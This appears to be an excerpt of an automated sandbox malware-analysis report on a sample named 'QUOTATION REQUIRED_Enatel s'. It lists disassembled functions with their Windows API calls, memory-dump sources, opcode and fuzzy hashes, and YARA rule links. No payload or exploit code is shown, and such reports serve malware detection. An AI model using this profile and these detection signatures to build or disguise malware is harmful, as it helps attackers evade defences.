                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$ForegroundPixelRelease
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4156661090-0
                                                                                                                    • Opcode ID: b66e8f5ba544e34b1cf784b174406b627802648fc147fb2ad11c51d62642cb6e
                                                                                                                    • Instruction ID: 26b83ae87862b5fb90742f45bf63d1f40caa79a1eda658204330e16c3e6bb1b7
                                                                                                                    • Opcode Fuzzy Hash: b66e8f5ba544e34b1cf784b174406b627802648fc147fb2ad11c51d62642cb6e
                                                                                                                    • Instruction Fuzzy Hash: B3218176A00204AFD714EF65CD84AAEBBE9EF45700F048468F84AA7352DB34AC44EB90
                                                                                                                    Function 00F4CDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 00F4CDC6
                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00F4CDE9
                                                                                                                      • Part of subcall function 00F43820: RtlAllocateHeap.NTDLL(00000000,?,00FE1444,?,00F2FDF5,?,?,00F1A976,00000010,00FE1440,00F113FC,?,00F113C6,?,00F11129), ref: 00F43852
                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00F4CE0F
                                                                                                                    • _free.LIBCMT ref: 00F4CE22
                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00F4CE31
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 336800556-0
                                                                                                                    • Opcode ID: 85648a8806a2743cc8dc5c537153505337f9f3f185867c8ecfcc9f03578612a0
                                                                                                                    • Instruction ID: 41074dd1cd0757a4f790f1cc15a6f444036199b4fdc9b0b00c856fbe0c46217c
                                                                                                                    • Opcode Fuzzy Hash: 85648a8806a2743cc8dc5c537153505337f9f3f185867c8ecfcc9f03578612a0
                                                                                                                    • Instruction Fuzzy Hash: 1F0184B2A032157F276116BA6C88D7B7D6DDEC7BA13151129FD05C7201EF658D02B1F0
                                                                                                                    Function 00F29639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F29693
                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 00F296A2
                                                                                                                    • BeginPath.GDI32(?), ref: 00F296B9
                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 00F296E2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ObjectSelect$BeginCreatePath
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3225163088-0
                                                                                                                    • Opcode ID: 86700862888fca113c41d52e5d746c544debb63ab0d19de01798345e74af7ae7
                                                                                                                    • Instruction ID: 411f6a8312757a394197a6f9af92c88b46740d7aa8e383558d9af57e4044ac8d
                                                                                                                    • Opcode Fuzzy Hash: 86700862888fca113c41d52e5d746c544debb63ab0d19de01798345e74af7ae7
                                                                                                                    • Instruction Fuzzy Hash: D1219F71806359EFDB119F26EC88BAD3FA8BB01365F104216F410AB1B2D3B49895FF90
                                                                                                                    Function 00F2990F Relevance: 7.6, APIs: 5, Instructions: 64COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetTextColor.GDI32(?,?), ref: 00F298D6
                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 00F298E9
                                                                                                                    • GetStockObject.GDI32(00000005), ref: 00F298F1
                                                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 00F29952
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ColorLongModeObjectStockTextWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2960364272-0
                                                                                                                    • Opcode ID: 2c186ea271cc2be81221c996690c41a3743c403770fb3fcbd4d96e4f86db0c3d
                                                                                                                    • Instruction ID: 408cd86b72a05038e461d57a92fb65aa51a2d4f4b46049afc125b540a44da212
                                                                                                                    • Opcode Fuzzy Hash: 2c186ea271cc2be81221c996690c41a3743c403770fb3fcbd4d96e4f86db0c3d
                                                                                                                    • Instruction Fuzzy Hash: 3C1127B29492649FC7218B75FC59BFA3B60AB53331F08015DE5924B1E2C7B14980FB51
                                                                                                                    Function 00F75711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memcmp
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2931989736-0
                                                                                                                    • Opcode ID: 87f8128c48d2025ab1485b1a7721110376880ad48551ea9c12f9cc0cc5bee0f0
                                                                                                                    • Instruction ID: 5aed0b1e3391286456e0d0b589c728bc4d72cc8b5c57d1d38200ae0b7fc92490
                                                                                                                    • Opcode Fuzzy Hash: 87f8128c48d2025ab1485b1a7721110376880ad48551ea9c12f9cc0cc5bee0f0
                                                                                                                    • Instruction Fuzzy Hash: 94019BA6A4160DFA920C55119D82FBA735D9B617B4F008026FD085E141F7A5EE15B2A2
                                                                                                                    Function 00F42DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetLastError.KERNEL32(?,?,?,00F3F2DE,00F43863,00FE1444,?,00F2FDF5,?,?,00F1A976,00000010,00FE1440,00F113FC,?,00F113C6), ref: 00F42DFD
                                                                                                                    • _free.LIBCMT ref: 00F42E32
                                                                                                                    • _free.LIBCMT ref: 00F42E59
                                                                                                                    • SetLastError.KERNEL32(00000000,00F11129), ref: 00F42E66
                                                                                                                    • SetLastError.KERNEL32(00000000,00F11129), ref: 00F42E6F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$_free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3170660625-0
                                                                                                                    • Opcode ID: 8f9b10e10a50b80693da3a925e3f2a1a9219512759c22633736df5d7ef15236d
                                                                                                                    • Instruction ID: 7ba15035ea4806dd112f55e5248e1474d5c6bd0ee2c1443230da4b0be6eea1b9
                                                                                                                    • Opcode Fuzzy Hash: 8f9b10e10a50b80693da3a925e3f2a1a9219512759c22633736df5d7ef15236d
                                                                                                                    • Instruction Fuzzy Hash: DB01F47360560577CA5267356C85E2B3E6AABD27B1BE40039FC25E2292EE78CC01B160
                                                                                                                    Function 00F7000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F6FF41,80070057,?,?,?,00F7035E), ref: 00F7002B
                                                                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F6FF41,80070057,?,?), ref: 00F70046
                                                                                                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F6FF41,80070057,?,?), ref: 00F70054
                                                                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F6FF41,80070057,?), ref: 00F70064
                                                                                                                    • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F6FF41,80070057,?,?), ref: 00F70070
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3897988419-0
                                                                                                                    • Opcode ID: 85d3f2b8bec18a42c550c8d08ee60faca53b7ac2ea329748e3ff2ae6ff992c55
                                                                                                                    • Instruction ID: 1eb50bf0f5d4d73285e88ad96496c7834600d3996495e4ceb542f2330adf5cb1
                                                                                                                    • Opcode Fuzzy Hash: 85d3f2b8bec18a42c550c8d08ee60faca53b7ac2ea329748e3ff2ae6ff992c55
                                                                                                                    • Instruction Fuzzy Hash: 680162B6600218FFDB114F69DC44BAA7BEDEF48761F148125F909D6210DB75DD40ABA0
                                                                                                                    Function 00F7E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 00F7E997
                                                                                                                    • QueryPerformanceFrequency.KERNEL32(?), ref: 00F7E9A5
                                                                                                                    • Sleep.KERNEL32(00000000), ref: 00F7E9AD
                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 00F7E9B7
                                                                                                                    • Sleep.KERNEL32 ref: 00F7E9F3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2833360925-0
                                                                                                                    • Opcode ID: 4e1446b989289b147cc530fe67f2d67243ec06d62574a44aad26b8968f3e41cd
                                                                                                                    • Instruction ID: 69cc7b2f040950127488b629c47487795b5a85a47c5ac893335cb760cc756d90
                                                                                                                    • Opcode Fuzzy Hash: 4e1446b989289b147cc530fe67f2d67243ec06d62574a44aad26b8968f3e41cd
                                                                                                                    • Instruction Fuzzy Hash: 83015B72D0152DDBCF009BE5DC49ADDBB78BF0E311F004587E606B2241CB349555EBA2
                                                                                                                    Function 00F710F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F71114
                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,?,?,00F70B9B,?,?,?), ref: 00F71120
                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00F70B9B,?,?,?), ref: 00F7112F
                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00F70B9B,?,?,?), ref: 00F71136
                                                                                                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F7114D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 842720411-0
                                                                                                                    • Opcode ID: 42a40c6086b1d7df6323914cc7d8a116a281fae3dbe77d5130e378dd8b944160
                                                                                                                    • Instruction ID: cc4c14f8e76c3580c2846b5220419e4f45812e9d3d1d180a4dd7f0e002b344f2
                                                                                                                    • Opcode Fuzzy Hash: 42a40c6086b1d7df6323914cc7d8a116a281fae3dbe77d5130e378dd8b944160
                                                                                                                    • Instruction Fuzzy Hash: C9011DB5600209BFDB114F69DC49A6A3B7EFF86360B514415FA45D7360DA71DD00AAA0
                                                                                                                    Function 00F70FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00F70FCA
                                                                                                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00F70FD6
                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00F70FE5
                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00F70FEC
                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00F71002
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 44706859-0
                                                                                                                    • Opcode ID: f6c3189d5c388aef546c6b85cdbb31916e3f24bff07c008cbd039e73502fae85
                                                                                                                    • Instruction ID: b54090c9b3b2404fbe9083f903c4f8bc3ee802731c4e1c94d6b32b2319304def
                                                                                                                    • Opcode Fuzzy Hash: f6c3189d5c388aef546c6b85cdbb31916e3f24bff07c008cbd039e73502fae85
                                                                                                                    • Instruction Fuzzy Hash: 1CF049B5600309ABDB214FA99C49F563BADFF8A762F108415FA49C6251DE70DC50AAA0
                                                                                                                    Function 00F71014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00F7102A
                                                                                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00F71036
                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F71045
                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00F7104C
                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F71062
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 44706859-0
                                                                                                                    • Opcode ID: 5398ae3fd9ff69d3dc32c5f153b3a51f63a2c0b5a970c417986b46fe5d0f9e69
                                                                                                                    • Instruction ID: b3d88f11d848e15bfabe97d25e6d087f77d428f8ce63bf1498bc72fc45595187
                                                                                                                    • Opcode Fuzzy Hash: 5398ae3fd9ff69d3dc32c5f153b3a51f63a2c0b5a970c417986b46fe5d0f9e69
                                                                                                                    • Instruction Fuzzy Hash: 60F06DB5200309FBDB215FA9EC49F563BAEFF8A761F104415FA49C7251DE70D850AAA0
                                                                                                                    Function 00F8030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00F8017D,?,00F832FC,?,00000001,00F52592,?), ref: 00F80324
                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00F8017D,?,00F832FC,?,00000001,00F52592,?), ref: 00F80331
                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00F8017D,?,00F832FC,?,00000001,00F52592,?), ref: 00F8033E
                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00F8017D,?,00F832FC,?,00000001,00F52592,?), ref: 00F8034B
                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00F8017D,?,00F832FC,?,00000001,00F52592,?), ref: 00F80358
                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00F8017D,?,00F832FC,?,00000001,00F52592,?), ref: 00F80365
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseHandle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2962429428-0
                                                                                                                    • Opcode ID: 778dc5edcca292fe31013cd125f31b345bd00eb54986f735c76098a1f0881679
                                                                                                                    • Instruction ID: 41e66d9c761bb7403246ecb94612fbac51a28a2e9c6afd31078bac300a380d33
                                                                                                                    • Opcode Fuzzy Hash: 778dc5edcca292fe31013cd125f31b345bd00eb54986f735c76098a1f0881679
                                                                                                                    • Instruction Fuzzy Hash: 6401AE72801B15DFCB30AF66D880852FBF9BF603253558A3FD19652931CBB1A958EF80
                                                                                                                    Function 00F4D73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _free.LIBCMT ref: 00F4D752
                                                                                                                      • Part of subcall function 00F429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00F4D7D1,00000000,00000000,00000000,00000000,?,00F4D7F8,00000000,00000007,00000000,?,00F4DBF5,00000000), ref: 00F429DE
                                                                                                                      • Part of subcall function 00F429C8: GetLastError.KERNEL32(00000000,?,00F4D7D1,00000000,00000000,00000000,00000000,?,00F4D7F8,00000000,00000007,00000000,?,00F4DBF5,00000000,00000000), ref: 00F429F0
                                                                                                                    • _free.LIBCMT ref: 00F4D764
                                                                                                                    • _free.LIBCMT ref: 00F4D776
                                                                                                                    • _free.LIBCMT ref: 00F4D788
                                                                                                                    • _free.LIBCMT ref: 00F4D79A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 776569668-0
                                                                                                                    • Opcode ID: 99b6dc2da6d8c8b103387ca1bd3ce904ad30d6db63cdd09287d5ee191e88867e
                                                                                                                    • Instruction ID: 6bdfd334b1148a894749ceb9afe35ba0d1628fe32c70232285b7df720c2c6c9e
                                                                                                                    • Opcode Fuzzy Hash: 99b6dc2da6d8c8b103387ca1bd3ce904ad30d6db63cdd09287d5ee191e88867e
                                                                                                                    • Instruction Fuzzy Hash: D4F01232945209AB9665EB69FDC5C167FEEBB447207D40C16F848D7501C734FC80B6A4
                                                                                                                    Function 00F75C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00F75C58
                                                                                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 00F75C6F
                                                                                                                    • MessageBeep.USER32(00000000), ref: 00F75C87
                                                                                                                    • KillTimer.USER32(?,0000040A), ref: 00F75CA3
                                                                                                                    • EndDialog.USER32(?,00000001), ref: 00F75CBD
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
